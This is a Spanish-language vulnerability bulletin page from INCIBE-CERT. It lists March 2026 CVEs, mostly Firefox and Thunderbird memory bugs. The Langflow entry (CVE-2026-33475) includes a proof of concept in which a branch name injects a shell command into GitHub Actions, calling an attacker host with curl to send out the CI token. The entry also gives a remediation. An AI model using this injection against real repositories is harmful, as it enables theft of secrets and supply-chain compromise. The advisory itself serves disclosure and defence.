Instituto Nacional de ciberseguridad. Sección Incibe
Instituto Nacional de Ciberseguridad. Sección INCIBE-CERT

Vulnerabilidades

Con el objetivo de informar, advertir y ayudar a los profesionales sobre las últimas vulnerabilidades de seguridad en sistemas tecnológicos, ponemos a disposición de los usuarios interesados en esta información una base de datos con información en castellano sobre cada una de las últimas vulnerabilidades documentadas y conocidas.

Este repositorio con más de 75.000 registros esta basado en la información de NVD (National Vulnerability Database) – en función de un acuerdo de colaboración – por el cual desde INCIBE realizamos la traducción al castellano de la información incluida. En ocasiones este listado mostrará vulnerabilidades que aún no han sido traducidas debido a que se recogen en el transcurso del tiempo en el que el equipo de INCIBE realiza el proceso de traducción.

Se emplea el estándar de nomenclatura de vulnerabilidades CVE (Common Vulnerabilities and Exposures), con el fin de facilitar el intercambio de información entre diferentes bases de datos y herramientas. Cada una de las vulnerabilidades recogidas enlaza a diversas fuentes de información así como a parches disponibles o soluciones aportadas por los fabricantes y desarrolladores. Es posible realizar búsquedas avanzadas teniendo la opción de seleccionar diferentes criterios como el tipo de vulnerabilidad, fabricante, tipo de impacto entre otros, con el fin de acortar los resultados.

Mediante suscripción RSS o Boletines podemos estar informados diariamente de las últimas vulnerabilidades incorporadas al repositorio.

Vulnerabilidad en componente Audio/Video: GMP Firefox y Thunderbird de Mozilla (CVE-2026-4709)

Fecha de publicación:
24/03/2026
Idioma:
Español
Condiciones de contorno incorrectas en el componente Audio/Video: GMP. Esta vulnerabilidad afecta a Firefox < 149, Firefox ESR < 115.34, Firefox ESR < 140.9, Thunderbird < 149, y Thunderbird < 140.9.
Gravedad CVSS v3.1: ALTA
Última modificación:
13/04/2026

Vulnerabilidad en componente de Audio/Video de Firefox y Thunderbird de Mozilla (CVE-2026-4710)

Fecha de publicación:
24/03/2026
Idioma:
Español
Condiciones de contorno incorrectas en el componente de Audio/Video. Esta vulnerabilidad afecta a Firefox < 149, Firefox ESR < 140.9, Thunderbird < 149 y Thunderbird < 140.9.
Gravedad CVSS v3.1: CRÍTICA
Última modificación:
13/04/2026

Vulnerabilidad en componente Responsive Design Mode de Firefox y Thunderbird de Mozilla (CVE-2026-4692)

Fecha de publicación:
24/03/2026
Idioma:
Español
Escape de sandbox en el componente Modo de Diseño Adaptable. Esta vulnerabilidad afecta a Firefox < 149, Firefox ESR < 115.34, Firefox ESR < 140.9, Thunderbird < 149, y Thunderbird < 140.9.
Gravedad CVSS v3.1: CRÍTICA
Última modificación:
13/04/2026

Vulnerabilidad en componente Audio/Video: Playback de Firefox y Thunderbird de Mozilla (CVE-2026-4693)

Fecha de publicación:
24/03/2026
Idioma:
Español
Condiciones de contorno incorrectas en el componente Audio/Video: Reproducción. Esta vulnerabilidad afecta a Firefox < 149, Firefox ESR < 115.34, Firefox ESR < 140.9, Thunderbird < 149, y Thunderbird < 140.9.
Gravedad CVSS v3.1: ALTA
Última modificación:
13/04/2026

Vulnerabilidad en componente Graphics de Firefox y Thunderbird de Mozilla (CVE-2026-4694)

Fecha de publicación:
24/03/2026
Idioma:
Español
Condiciones de contorno incorrectas, desbordamiento de entero en el componente Gráficos. Esta vulnerabilidad afecta a Firefox < 149, Firefox ESR < 115.34, Firefox ESR < 140.9, Thunderbird < 149 y Thunderbird < 140.9.
Gravedad CVSS v3.1: ALTA
Última modificación:
13/04/2026

Vulnerabilidad en componente Audio/Video: Web Codecs de Firefox y Thunderbird de Mozilla (CVE-2026-4695)

Fecha de publicación:
24/03/2026
Idioma:
Español
Condiciones de contorno incorrectas en el componente Audio/Video: Web Codecs. Esta vulnerabilidad afecta a Firefox < 149, Firefox ESR < 140.9, Thunderbird < 149 y Thunderbird < 140.9.
Gravedad CVSS v3.1: ALTA
Última modificación:
13/04/2026

Vulnerabilidad en componente Layout: Text and Fonts de Firefox y Thunderbird de Mozilla (CVE-2026-4696)

Fecha de publicación:
24/03/2026
Idioma:
Español
Uso después de liberación en el componente Diseño: Texto y Fuentes. Esta vulnerabilidad afecta a Firefox < 149, Firefox ESR < 115.34, Firefox ESR < 140.9, Thunderbird < 149, y Thunderbird < 140.9.
Gravedad CVSS v3.1: CRÍTICA
Última modificación:
13/04/2026

Vulnerabilidad en componente Audio/Video: Web Codecs de Firefox y Thunderbird de Mozilla (CVE-2026-4697)

Fecha de publicación:
24/03/2026
Idioma:
Español
Condiciones de contorno incorrectas en el componente Audio/Video: Web Codecs. Esta vulnerabilidad afecta a Firefox < 149, Firefox ESR < 140.9, Thunderbird < 149, y Thunderbird < 140.9.
Gravedad CVSS v3.1: ALTA
Última modificación:
13/04/2026

Vulnerabilidad en componente JavaScript Engine: JIT de Firefox y Thunderbird de Mozilla (CVE-2026-4698)

Fecha de publicación:
24/03/2026
Idioma:
Español
Miscompilación JIT en el motor JavaScript: Componente JIT. Esta vulnerabilidad afecta a Firefox < 149, Firefox ESR < 115.34, Firefox ESR < 140.9, Thunderbird < 149 y Thunderbird < 140.9.
Gravedad CVSS v3.1: CRÍTICA
Última modificación:
13/04/2026

Vulnerabilidad en componente Layout: Text and Fonts de Firefox y Thunderbird de Mozilla (CVE-2026-4699)

Fecha de publicación:
24/03/2026
Idioma:
Español
Condiciones de contorno incorrectas en el componente Diseño: Texto y Fuentes. Esta vulnerabilidad afecta a Firefox < 149, Firefox ESR < 115.34, Firefox ESR < 140.9, Thunderbird < 149, y Thunderbird < 140.9.
Gravedad CVSS v3.1: ALTA
Última modificación:
13/04/2026

Vulnerabilidad en langflow de langflow-ai (CVE-2026-33475)

Fecha de publicación:
24/03/2026
Idioma:
Español
Langflow es una herramienta para construir y desplegar agentes y flujos de trabajo impulsados por IA. Una vulnerabilidad de inyección de shell remota no autenticada existe en múltiples flujos de trabajo de GitHub Actions en el repositorio de Langflow antes de la versión 1.9.0. La interpolación no saneada de variables de contexto de GitHub (por ejemplo, `${{ github.head_ref }}`) en los pasos `run:` permite a los atacantes inyectar y ejecutar comandos de shell arbitrarios a través de un nombre de rama o título de solicitud de extracción malicioso. Esto puede llevar a la exfiltración de secretos (por ejemplo, `GITHUB_TOKEN`), manipulación de infraestructura o compromiso de la cadena de suministro durante la ejecución de CI/CD. La versión 1.9.0 parchea la vulnerabilidad.<br /> <br /> ---<br /> <br /> ### Detalles<br /> <br /> Varios flujos de trabajo en `.github/workflows/` y `.github/actions/` referencian variables de contexto de GitHub directamente en comandos de shell `run:`, como:<br /> <br /> ```yaml<br /> run: |<br /> validate_branch_name "${{ github.event.pull_request.head.ref }}"<br /> ```<br /> <br /> O:<br /> <br /> ```yaml<br /> run: npx playwright install ${{ inputs.browsers }} --with-deps<br /> ```<br /> <br /> Dado que `github.head_ref`, `github.event.pull_request.title` y `inputs.*` personalizados pueden contener valores controlados por el usuario, deben tratarse como entrada no confiable. La interpolación directa sin el entrecomillado o saneamiento adecuados conduce a la inyección de comandos de shell.<br /> <br /> ---<br /> <br /> ### PoC<br /> <br /> 1. Bifurcar el repositorio de Langflow<br /> 2. Crear una nueva rama con el nombre:<br /> ```bash<br /> injection-test &amp;amp;&amp;amp; curl https://attacker.site/exfil?token=$GITHUB_TOKEN<br /> ```<br /> 3. Abrir una solicitud de extracción a la rama principal desde la nueva rama<br /> 4. GitHub Actions ejecutará el flujo de trabajo afectado (por ejemplo, `deploy-docs-draft.yml`)<br /> 5. El paso `run:` que contiene:<br /> ```yaml<br /> echo "Branch: ${{ github.head_ref }}"<br /> ```<br /> Ejecutará:<br /> ```bash<br /> echo "Branch: injection-test"<br /> curl https://attacker.site/exfil?token=$GITHUB_TOKEN<br /> ```<br /> <br /> 6. El atacante recibe el secreto de CI a través de la URL de exfiltración.<br /> <br /> ---<br /> <br /> ### Impacto<br /> <br /> - Tipo: Inyección de Shell / Ejecución Remota de Código en CI<br /> - Alcance: Cualquier bifurcación pública de Langflow con GitHub Actions habilitado<br /> - Impacto: Acceso total a secretos de CI (por ejemplo, `GITHUB_TOKEN`), posibilidad de subir etiquetas o imágenes maliciosas, manipular lanzamientos o filtrar datos de infraestructura sensibles<br /> <br /> ---<br /> <br /> ### Solución Sugerida<br /> <br /> Refactorizar los flujos de trabajo afectados para usar variables de entorno y envolverlas en comillas dobles:<br /> <br /> ```yaml<br /> env:<br /> BRANCH_NAME: ${{ github.head_ref }}<br /> run: |<br /> echo "Branch is: \"$BRANCH_NAME\""<br /> ```<br /> <br /> Evitar la interpolación directa `${{ ... }}` dentro de `run:` para cualquier valor controlado por el usuario.<br /> <br /> ---<br /> <br /> ### Archivos Afectados (Langflow `1.3.4`)<br /> <br /> - `.github/actions/install-playwright/action.yml`<br /> - `.github/workflows/deploy-docs-draft.yml`<br /> - `.github/workflows/docker-build.yml`<br /> - `.github/workflows/release_nightly.yml`<br /> - `.github/workflows/python_test.yml`<br /> - `.github/workflows/typescript_test.yml`
Gravedad CVSS v3.1: CRÍTICA
Última modificación:
24/03/2026

Vulnerabilidad en componente Graphics: WebRender de Firefox y Thunderbird de Mozilla (CVE-2026-4684)

Fecha de publicación:
24/03/2026
Idioma:
Español
Condición de carrera, uso después de liberación en el componente Gráficos: WebRender. Esta vulnerabilidad afecta a Firefox &amp;lt; 149, Firefox ESR &amp;lt; 115.34, Firefox ESR &amp;lt; 140.9, Thunderbird &amp;lt; 149, y Thunderbird &amp;lt; 140.9.
Gravedad CVSS v3.1: ALTA
Última modificación:
13/04/2026